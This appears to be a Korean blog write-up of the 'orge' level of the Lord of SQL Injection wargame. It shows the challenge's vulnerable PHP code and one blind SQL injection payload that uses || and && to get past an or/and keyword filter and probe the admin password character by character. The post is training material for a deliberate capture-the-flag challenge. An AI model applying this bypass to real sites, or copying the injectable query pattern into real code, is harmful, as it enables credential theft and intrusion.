query : select id from prob_orge where id='guest' and pw=''

<?php 
  
include "./config.php"
  
login_chk(); 
  
dbconnect(); 
  if(
preg_match('/prob|_|\.|\(\)/i'$_GET[pw])) exit("No Hack ~_~"); 
  if(
preg_match('/or|and/i'$_GET[pw])) exit("HeHe"); 
  
$query "select id from prob_orge where id='guest' and pw='{$_GET[pw]}'"
  echo 
"<hr>query : <strong>{$query}</strong><hr><br>"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if(
$result['id']) echo "<h2>Hello {$result[id]}</h2>"
   
  
$_GET[pw] = addslashes($_GET[pw]); 
  
$query "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'"
  
$result = @mysql_fetch_array(mysql_query($query)); 
  if((
$result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 
  
highlight_file(__FILE__); 
?>



  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 


blind sqli로 pw값을 구해야 합니다. id는 admin으로 고정이고 or / and 논리연산자가 필터링 되어있습니다.


 ?pw='||id='admin'%26%26substr(pw,1,1)=0x41%23

...

payload









'Web > LOS (Lord of SQL)' 카테고리의 다른 글

los(lord of sql) level 9 - vampire  (0) 2018.08.21
los(lord of sql) level 8 - troll  (0) 2018.08.21
los(lord of sql) level 7 - orge  (0) 2018.08.21
los(lord of sql) level 6 - darkelf  (0) 2018.08.21
los(lord of sql) level 5 - wolfman  (0) 2018.08.21
los(lord of sql) level 4 - orc  (0) 2018.08.21

+ Recent posts